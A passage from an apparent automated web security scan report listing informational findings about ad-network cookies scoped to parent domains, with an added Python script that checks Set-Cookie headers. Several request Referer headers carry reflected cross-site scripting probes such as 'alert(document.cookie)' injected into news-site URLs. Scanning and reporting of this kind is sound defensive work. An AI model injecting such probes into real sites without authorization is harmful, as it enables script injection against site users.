Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63722/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63722/0/vj?ajecscp=1296224075221&z=hpi&dim=63352&pos=1&pv=1866403664462269&nc=5322587 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 14:14:34 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/
Set-Cookie: i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693
Set-Cookie: ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/

document.write("<"+"script language=\"JavaScript\">\n");
document.write("var zflag_nid=\"1220\"; var zflag_cid=\"101\"; var zflag_sid=\"69\"; var zflag_width=\"300\"; var zflag_height=\"250\"; var zfl
...[SNIP]...

10.55. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X631Sh003KAA; optin=Aa; i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 16:46:05 GMT
Connection: close
Set-Cookie: c=201003Ptn3Ji53Por0000-N81mUzJ_0VX17742515437_149163_2FX101379805453000035Ds;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 16:46:05 GMT;Path=/servlet/ajrotator/track/pt63693


10.56. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63723/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63723/0/vj?z=hpi&dim=63359&pos=1&pv=972835293505342&nc=23918955 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X6003Csd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 14:48:31 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: i=201013Ptn3Ji53Por0000-N81mUzJ_0VX17740822913_677625_2FX101379805453000031de;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 14:48:32 GMT;Path=/servlet/ajrotator/track/pt63693
Set-Cookie: ajcmp=20236X631Sh003KAA;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:48:32 GMT;Path=/

document.write("<"+"script language=\"JavaScript\">\n");
document.write("var zflag_nid=\"1220\"; var zflag_cid=\"167\"; var zflag_sid=\"126\"; var zflag_width=\"728\"; var zflag_height=\"90\"; var zfl
...[SNIP]...

10.57. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63733/0/cj/V1259C3470CJ-573I704K63342ADC1D6F3ADC1D6F3K63720K63690QK63352QQP0G00G0Q05BC65C8000056/ HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ajcmp=20236X00631Sh00PZ; optin=Aa; i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX; ajess1_ADC1D6F3ECF9BDEC48AA769B=a;

Response

HTTP/1.1 302 Moved Temporarily
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Location: http://
Server: JBird/1.0b
Date: Fri, 28 Jan 2011 17:26:43 GMT
Connection: close
Set-Cookie: c=201003Ji03JiF3JhX0000-N81mUzJ_0VX17743400865_266261_2FX10137980545300003FMt;Domain=.rotator.hadj7.adjuggler.net;Max-Age=2592000;expires=Sun, 27 Feb 2011 17:26:43 GMT;Path=/servlet/ajrotator/track/pt63689


10.58. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63733/0/vj

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hpi.rotator.hadj7.adjuggler.net
Path:   /servlet/ajrotator/63733/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/63733/0/vj?z=hpi&dim=63352&pos=1&pv=7891522417776288&nc=72556237 HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/cssb1a8f'%3balert(1)//59512309c7e/20090601/nydn_homepage.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ajess1_ADC1D6F3ECF9BDEC48AA769B=a; ajcmp=20236X631Sh003KAA

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Fri, 28 Jan 2011 16:41:43 GMT
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Content-Type: application/x-javascript
Set-Cookie: i=201013Ji03JiF3JhX0000-N81mUzJ_0VX17742330184_374947_2FX10137980545300003BZX;Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;expires=Sat, 29 Jan 2011 16:41:44 GMT;Path=/servlet/ajrotator/track/pt63689
Set-Cookie: ajcmp=20236X00631Sh00PZ;Max-Age=63072000;expires=Sun, 27 Jan 2013 16:41:44 GMT;Path=/

document.write("<"+"!--Iframe Tag -->\n");
document.write("<"+"!-- begin ZEDO for channel: HLW on MB - CPM , publisher: MB Network , Ad Dimension: Medium Rectangle - 300 x 250 -->\n");
document.write
...[SNIP]...

10.59. http://ib.adnxs.com/ab

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ab?enc=K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA.&tt_code=nydailynews.com&udj=uf%28%27a%27%2C+537%2C+1296224069%29%3Buf%28%27c%27%2C+5740%2C+1296224069%29%3Buf%28%27r%27%2C+157830%2C+1296224069%29%3Bppv%28783%2C+%273218538236873087490%27%2C+1296224069%2C+1297520069%2C+5740%2C+25733%29%3B&cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI.&referrer=http://www.nydailynews.com/blogs70f75 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ=FzXN9?TZi)>y1-^s2mzPD+@4+<i:[v#mk@cE3+b8?jraDJt@%+`'uLM/Dl+8<5/!Ww5LUeE=7?vbgm<6zEk@/WBJ[MOl!9-@aXV4)=rJOM@R5(?)a%ZJ2Wcbf*>2GHpO^8q6y4.W-*y?$3o38q>cC^S[A.LeTUm`>tMe:Vn15)3V9!][_fmn.CQInWmsln_lnhV2sS:M5*3DU7fN@fu#Pa!9L%Hn?en]; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; path=/; expires=Thu, 28-Apr-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly
Date: Fri, 28 Jan 2011 14:14:29 GMT
Content-Length: 802

document.write('<a href="http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBA
...[SNIP]...
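
Every finding in this run of the report (10.48 through 10.60) is the same check: a Set-Cookie header whose Domain attribute names a parent of the host that issued it, such as d7.zedo.com setting domain=.zedo.com, or hpi.rotator.hadj7.adjuggler.net setting Domain=.rotator.hadj7.adjuggler.net. The script below is an added example, not code from the CloudScan report, from Burp, or from any of the ad networks shown; it parses Set-Cookie values the way such a check would, flags parent-domain scoping together with missing HttpOnly and Secure attributes, and runs over three header values copied from the responses above. One assumption to keep in mind: it does not consult the Public Suffix List, so it treats ".com" the same as ".zedo.com" even though browsers reject the former.

```python
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass
class CookieFinding:
    """What a scanner reports for one Set-Cookie header."""
    name: str
    issuing_host: str
    domain: Optional[str]      # Domain attribute exactly as sent, or None if absent
    parent_scoped: bool        # Domain names a proper parent of issuing_host
    httponly: bool
    secure: bool


def parse_set_cookie(header_value: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a Set-Cookie value into (name, value, attributes).

    Attributes are keyed in lower case; flag attributes such as HttpOnly map
    to an empty string. Splitting on ';' is safe for Expires values such as
    'Sat, 29 Jan 2011 05:00:00 GMT' because they contain no ';'.
    """
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, str] = {}
    for part in parts[1:]:
        if not part:                      # a trailing ';' leaves an empty part
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value.strip(), attrs


def is_parent_domain(issuing_host: str, domain_attr: str) -> bool:
    """True when domain_attr is a proper ancestor of issuing_host.

    Browsers ignore the leading dot ('.zedo.com' means 'zedo.com'), so the
    comparison does too; a Domain equal to the host itself is not parent-scoped.
    Assumption: no Public Suffix List lookup, so '.com' would be reported too.
    """
    host = issuing_host.lower().rstrip(".")
    dom = domain_attr.lower().lstrip(".").rstrip(".")
    if not dom or dom == host:
        return False
    return host.endswith("." + dom)


def assess(issuing_host: str, set_cookie_headers: List[str]) -> List[CookieFinding]:
    """Produce one finding per Set-Cookie header issued by the given host."""
    findings = []
    for header in set_cookie_headers:
        name, _value, attrs = parse_set_cookie(header)
        domain = attrs.get("domain")
        findings.append(CookieFinding(
            name=name,
            issuing_host=issuing_host,
            domain=domain,
            parent_scoped=domain is not None and is_parent_domain(issuing_host, domain),
            httponly="httponly" in attrs,
            secure="secure" in attrs,
        ))
    return findings


def report(findings: List[CookieFinding]) -> List[str]:
    """Render findings as one line each, in the spirit of the report above."""
    lines = []
    for f in findings:
        flags = []
        if f.parent_scoped:
            flags.append(f"scoped to parent domain {f.domain}")
        if not f.httponly:
            flags.append("no HttpOnly")
        if not f.secure:
            flags.append("no Secure")
        lines.append(f"{f.issuing_host}: {f.name}: " + ("; ".join(flags) or "ok"))
    return lines


# Sample input: Set-Cookie values copied from the responses in this section
# (d7.zedo.com, hpi.rotator.hadj7.adjuggler.net and ib.adnxs.com).
SAMPLES = {
    "d7.zedo.com": [
        "FFgeo=5386156;expires=Sat, 28 Jan 2012 16:41:44 GMT;domain=.zedo.com;path=/;",
    ],
    "hpi.rotator.hadj7.adjuggler.net": [
        "ajcmp=20236X6003Csd;Max-Age=63072000;expires=Sun, 27 Jan 2013 14:14:35 GMT;Path=/",
        "i=201013Jhk3Ji23Jhj0000-N81mUzJ_0VX17740399776_948869_2FX101379805453000036Iu;"
        "Domain=.rotator.hadj7.adjuggler.net;Max-Age=86400;"
        "expires=Sat, 29 Jan 2011 14:14:35 GMT;Path=/servlet/ajrotator/track/pt63693",
    ],
    "ib.adnxs.com": [
        "sess=1; path=/; expires=Sat, 29-Jan-2011 14:14:29 GMT; domain=.adnxs.com; HttpOnly",
    ],
}

if __name__ == "__main__":
    for host, headers in SAMPLES.items():
        for line in report(assess(host, headers)):
            print(line)
```

Run as-is it prints one line per cookie. Note how the adnxs.com cookies differ from the ZEDO and AdJuggler ones: they are parent-scoped too, but carry HttpOnly, so a script injected into a sibling host cannot read them; the report's "review the contents" advice is what decides whether the ZEDO frequency-capping cookies (FFCap, FFChanCap, FFad) matter at all.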

10.60. http://ib.adnxs.com/click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/K01KQbd3DUBJwvOPFK4KQAAAAGBmZgJAScLzjxSuCkArTUpBt3cNQAIa1VB5i6osBWHfHSmrEEJFz0JNAAAAADgQAQDLAQAANQEAAAIAAACGaAIAhWQAAAEAAABVU0QAVVNEANgCWgD2DLoDvgQBAgUCAAIAAAAAox0IPAAAAAA./cnd=!txXYTwjsLBCG0QkYACCFyQEougcxnEjEH7d3DUBCEwgAEAAYACABKP7__________wFIAFAAWPYZYABotQI./referrer=http:/www.nydailynews.com/blogs70f75/clickenc=http:/www.clickability.com/campaigns/Express_Datasheet.html?sfcid=70180000000fUSJ HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:18 GMT; domain=.adnxs.com; HttpOnly
Location: http:/www.clickability.com/campaigns/Express_Datasheet.html?sfcid=70180000000fUSJ
Date: Fri, 28 Jan 2011 16:46:18 GMT
Content-Length: 0
Connection: close


10.61. http://ib.adnxs.com/getuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid HTTP/1.1
Host: ib.adnxs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb; icu=EAAYAA..; uuid2=4760492999213801733; sess=1;

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 16:46:21 GMT; domain=.adnxs.com; HttpOnly
Location: .c.7
Date: Fri, 28 Jan 2011 16:46:21 GMT
Content-Length: 0
Connection: close


10.62. http://ib.adnxs.com/getuidnb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http%3A%2F%2Fpixel.rubiconproject.com%2Ftap.php%3Fv%3D4894%26nid%3D1986%26put%3D$UID%26expires%3D30 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://assets.rubiconproject.com/static/rtb/sync-min.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; sess=1; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:P4x>H+=q5PufidQD2]*](K9'9kOYZb

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 14:48:49 GMT; domain=.adnxs.com; HttpOnly
Location: http://pixel.rubiconproject.com/tap.php?v=4894&nid=1986&put=4760492999213801733&expires=30
Date: Fri, 28 Jan 2011 14:48:49 GMT
Content-Length: 0


10.63. http://ib.adnxs.com/getuidu

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /getuidu

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidu?http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=3011330574290390485&mktid=3&mpid=1051206&fpid=-1&rnd=3899286550461626968&nu=n&sp=n
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=EAAYAA..; uuid2=4760492999213801733; anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9=FzXN9?TZi)>y1-4(^NfPD+@4+=p-.ut5]P'*l.AkLC:ZoWT8jurJFwtQgyR2#Z@Gma]02msi.X/+T:%u.sH%ptkhWT<T7O/!9fZN1X_94IFwbrUH.AC0A)'9DjhifCjr1a#[FbrxvsnEr]VJ@?3JlsWCTM<[<X>vc9aJjqyKfLgisMsE@+/IU*K*VTJy:$78zsR5OeIufidQD2]*](K9'=5f>*@; sess=1

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Sat, 29-Jan-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=4760492999213801733; path=/; expires=Thu, 28-Apr-2011 17:37:32 GMT; domain=.adnxs.com; HttpOnly
Location: http://segment-pixel.invitemedia.com/setuid?exchange_id=2&exchange_uid=4760492999213801733
Date: Fri, 28 Jan 2011 17:37:32 GMT
Content-Length: 0


10.64. http://ib.adnxs.com/mapuid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /mapuid

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mapuid?member=364&user=914803576615380,rcHW800iZiMAAocf HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/B3DM/DLX/1@x71
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
